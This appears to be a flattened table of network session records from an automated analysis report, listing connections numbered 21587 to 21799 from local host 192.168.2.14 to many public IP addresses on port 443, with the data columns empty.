                                                        21587192.168.2.1453540170.0.237.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21588192.168.2.145506878.77.93.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21589192.168.2.145640668.29.130.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21590192.168.2.14335345.23.230.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21591192.168.2.14525429.114.40.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21592192.168.2.145880040.26.230.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21593192.168.2.1460860168.178.223.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21594192.168.2.14461344.79.107.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21595192.168.2.1451588217.12.83.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21596192.168.2.1449966199.151.252.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21597192.168.2.144664062.23.88.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21598192.168.2.145958286.205.2.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21599192.168.2.143590237.171.28.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21600192.168.2.144015232.229.240.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21601192.168.2.144757431.57.165.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21602192.168.2.14353622.71.105.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21603192.168.2.144949470.60.208.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21604192.168.2.1455858184.227.162.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21605192.168.2.1448900157.169.203.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21606192.168.2.1444690210.187.78.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21607192.168.2.1443580193.48.149.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21608192.168.2.1437072210.166.190.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21609192.168.2.143783639.211.220.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21610192.168.2.1451138180.179.217.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21611192.168.2.1446934216.78.147.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21612192.168.2.1434982202.106.19.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21613192.168.2.1443172181.182.67.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21614192.168.2.1459890103.178.18.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21615192.168.2.144701657.151.227.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21616192.168.2.1448780202.47.247.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21617192.168.2.1442366187.204.7.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21618192.168.2.145746093.125.195.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21619192.168.2.1458286206.14.85.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21620192.168.2.1445628218.218.138.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21621192.168.2.1458448199.219.66.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21622192.168.2.1439628167.219.115.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21623192.168.2.1448592133.164.107.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21624192.168.2.1458130102.124.236.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21625192.168.2.143303099.234.43.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21626192.168.2.1452270181.167.76.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21627192.168.2.1435680182.246.66.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21628192.168.2.144344035.255.55.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21629192.168.2.1438828167.19.93.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21630192.168.2.143968238.110.113.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21631192.168.2.1442580141.139.236.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21632192.168.2.1456110158.138.211.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21633192.168.2.144733662.157.71.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21634192.168.2.144235073.23.132.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21635192.168.2.143568488.175.70.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21636192.168.2.1433812128.254.60.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21637192.168.2.1457560122.162.146.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21638192.168.2.143626446.24.167.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21639192.168.2.1460536152.204.226.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21640192.168.2.146083623.255.120.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21641192.168.2.146070048.41.184.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21642192.168.2.143771282.0.118.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21643192.168.2.144671641.194.156.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21644192.168.2.145697870.225.235.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21645192.168.2.1442288167.21.9.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21646192.168.2.146073213.46.163.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21647192.168.2.144287846.8.56.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21648192.168.2.145385489.71.93.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21649192.168.2.1437890106.31.94.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21650192.168.2.1435408113.219.173.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21651192.168.2.144058041.214.48.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21652192.168.2.143850623.182.23.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21653192.168.2.1454230170.130.118.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21654192.168.2.1454870159.137.54.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21655192.168.2.145538651.24.207.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21656192.168.2.1436272198.199.8.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21657192.168.2.1435120188.69.215.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21658192.168.2.14450062.52.62.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21659192.168.2.145088817.9.116.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21660192.168.2.1433986149.123.11.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21661192.168.2.143499277.135.6.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21662192.168.2.1444986163.194.187.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21663192.168.2.1455938137.112.40.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21664192.168.2.1450848158.53.74.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21665192.168.2.144785636.143.105.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21666192.168.2.144162459.196.97.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21667192.168.2.144726496.105.187.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21668192.168.2.1437200140.240.152.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21669192.168.2.145001869.241.39.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21670192.168.2.145952872.183.203.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21671192.168.2.144393295.200.6.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21672192.168.2.144927260.31.2.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21673192.168.2.144983451.43.230.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21674192.168.2.1452846182.97.161.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21675192.168.2.1458278179.117.174.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21676192.168.2.1450640138.206.163.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21677192.168.2.145227488.145.224.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21678192.168.2.144353439.225.9.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21679192.168.2.144240491.208.206.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21680192.168.2.145777878.137.76.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21681192.168.2.1440792194.102.116.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21682192.168.2.1432982216.130.57.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21683192.168.2.1454460191.174.178.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21684192.168.2.1433788144.143.166.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21685192.168.2.14567081.22.125.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21686192.168.2.1460014200.239.246.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21687192.168.2.144599636.202.151.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21688192.168.2.144443437.84.145.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21689192.168.2.1451412137.40.77.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21690192.168.2.144036457.39.68.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21691192.168.2.143541058.55.26.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21692192.168.2.1456968122.8.231.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21693192.168.2.1439310193.165.167.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21694192.168.2.1436738189.76.94.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21695192.168.2.144566272.27.245.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21696192.168.2.1436120113.134.184.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21697192.168.2.144408072.192.220.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21698192.168.2.1438542165.177.14.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21699192.168.2.1457092205.200.119.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21700192.168.2.1455870143.202.54.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21701192.168.2.144400069.42.45.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21702192.168.2.1439232167.157.100.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21703192.168.2.144299625.141.247.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21704192.168.2.145094072.19.79.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21705192.168.2.146098643.218.226.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21706192.168.2.1440350102.161.0.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21707192.168.2.1442674109.250.73.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21708192.168.2.1449460138.239.225.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21709192.168.2.1453240126.248.236.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21710192.168.2.145688284.146.3.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21711192.168.2.145885684.51.188.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21712192.168.2.143658614.210.28.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21713192.168.2.1435936128.60.158.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21714192.168.2.1449460198.132.133.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21715192.168.2.1460752159.197.96.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21716192.168.2.1442738193.113.191.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21717192.168.2.1453800103.219.8.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21718192.168.2.1446312149.60.85.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21719192.168.2.1443418160.172.122.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21720192.168.2.1446058148.131.149.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21721192.168.2.1435398218.72.139.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21722192.168.2.145228482.177.216.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21723192.168.2.1443878112.91.90.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21724192.168.2.1450166196.107.24.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21725192.168.2.145783284.47.138.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21726192.168.2.1458934170.200.141.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21727192.168.2.145347023.201.15.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21728192.168.2.1452238174.54.157.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21729192.168.2.144959081.71.196.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21730192.168.2.144708875.152.249.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21731192.168.2.1446936195.184.210.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21732192.168.2.146090435.121.157.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21733192.168.2.1457796222.182.191.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21734192.168.2.145471881.129.248.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21735192.168.2.143855070.248.254.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21736192.168.2.143411051.178.206.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21737192.168.2.1437586150.147.227.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21738192.168.2.1459126118.5.218.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21739192.168.2.143601285.179.84.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21740192.168.2.1444540109.133.216.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21741192.168.2.1459304118.87.67.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21742192.168.2.1441848203.188.238.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21743192.168.2.14339408.48.37.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21744192.168.2.1436500132.25.40.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21745192.168.2.145014488.160.103.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21746192.168.2.1446438155.130.68.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21747192.168.2.145053274.145.102.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21748192.168.2.144158462.102.76.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21749192.168.2.1448076181.206.2.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21750192.168.2.1436488116.11.37.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21751192.168.2.1435694219.211.165.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21752192.168.2.1442392223.141.203.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21753192.168.2.1435786189.18.60.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21754192.168.2.145781440.187.50.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21755192.168.2.144788690.38.85.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21756192.168.2.1443022203.151.106.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21757192.168.2.1460102174.183.163.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21758192.168.2.144124277.218.26.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21759192.168.2.1443792217.216.243.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21760192.168.2.1453500207.183.4.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21761192.168.2.1444254184.61.150.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21762192.168.2.1439618119.3.252.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21763192.168.2.1455448151.52.240.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21764192.168.2.1460474174.162.240.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21765192.168.2.1438158122.121.90.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21766192.168.2.1435868154.208.171.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21767192.168.2.144539488.158.214.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21768192.168.2.145546453.157.163.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21769192.168.2.1434630123.23.214.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21770192.168.2.1458394137.160.114.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21771192.168.2.1446938199.110.238.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21772192.168.2.1438746120.52.182.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21773192.168.2.143449299.68.255.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21774192.168.2.1449694187.70.168.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21775192.168.2.1458440122.194.234.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21776192.168.2.143326623.129.126.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21777192.168.2.144185488.190.206.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21778192.168.2.1450516113.59.202.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21779192.168.2.1442094104.85.239.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21780192.168.2.144543837.205.26.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21781192.168.2.143720061.7.61.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21782192.168.2.144450076.243.115.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21783192.168.2.1443766198.79.143.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21784192.168.2.1442632101.58.164.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21785192.168.2.144851490.56.235.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21786192.168.2.1456796171.52.160.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21787192.168.2.1445400217.136.87.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21788192.168.2.145890282.79.158.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21789192.168.2.1444654185.126.29.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21790192.168.2.1442298156.171.169.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21791192.168.2.144663247.125.50.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21792192.168.2.1441028219.164.152.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21793192.168.2.1445374203.220.31.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21794192.168.2.144240458.49.66.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21795192.168.2.1440894190.180.69.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21796192.168.2.1457296111.60.177.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21797192.168.2.1441178135.32.199.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21798192.168.2.144116631.112.78.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21799192.168.2.1443750107.9.168.79443
